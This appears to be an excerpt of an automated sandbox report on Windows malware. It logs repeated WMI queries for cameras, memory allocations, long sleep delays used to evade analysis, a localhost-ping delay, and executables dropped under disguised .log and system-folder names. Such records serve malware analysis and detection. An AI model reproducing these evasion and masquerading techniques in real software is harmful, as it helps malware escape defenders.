                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: 15B0000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: 1B160000 memory reserve | memory write watch
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Memory allocated: 26B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Memory allocated: 1A8E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Memory allocated: 13E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Memory allocated: 1B140000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Memory allocated: C40000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Memory allocated: 1A710000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Memory allocated: 1340000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Memory allocated: 1AD80000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: 2980000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: 1AB60000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: A60000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Memory allocated: 1A630000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Memory allocated: EE0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Memory allocated: 1A8B0000 memory reserve | memory write watch
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 600000
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599890
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599778
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599671
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599562
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599453
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599344
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599234
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 599125
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 596953
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 596812
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 596615
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 596422
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 596203
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 600000
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 599567
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 598687
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 598453
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 598281
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 598093
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 3600000
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 597937
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 597312
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 597078
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 596484
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 596015
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 595884
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 595750
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 595613
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 595325
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 595156
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594944
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594839
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594718
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594548
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594422
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594257
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 594147
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593953
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593812
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593639
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593466
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593219
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 593100
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 300000
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592984
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592874
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592764
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592656
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592546
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592436
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 592299
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Window / User API: threadDelayed 5307
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Window / User API: threadDelayed 4657
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Window / User API: threadDelayed 5087
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3372
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2446
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3912
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2755
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2294
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2626
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MXTAwxLv.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lhjGsiaz.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XLyrgJGd.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mhsoucuo.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CjxtNgkC.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XGvzhUkS.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wVOwcuVh.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MaBbbrQq.log
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XurZRnMb.log
                                    Source: C:\webHostnet\MsPortSavesruntime.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MSRJxIpk.log
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exe Evasive API call chain: GetLocalTime,DecisionNodesgraph_0-23757
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -18446744073709540s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -600000s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599890s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599778s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599671s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599562s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599453s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599344s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599234s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -599125s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -100000s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99891s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99781s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99672s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99562s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99453s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99343s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99234s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99125s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -99015s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98906s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98770s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98641s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98531s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98422s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98312s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98203s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -98090s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -97984s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -596953s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -596812s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -596615s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -596422s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 1860 Thread sleep time: -596203s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 3084 Thread sleep time: -30000s >= -30000s
                                    Source: C:\webHostnet\MsPortSavesruntime.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3272 Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -30437127721620741s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -600000s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -599567s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -598687s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -598453s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -598281s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -598093s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 6952 Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -597937s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -597312s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -597078s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -596484s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -596015s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -595884s >= -30000s
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe TID: 3796 Thread sleep time: -595750s >= -30000s
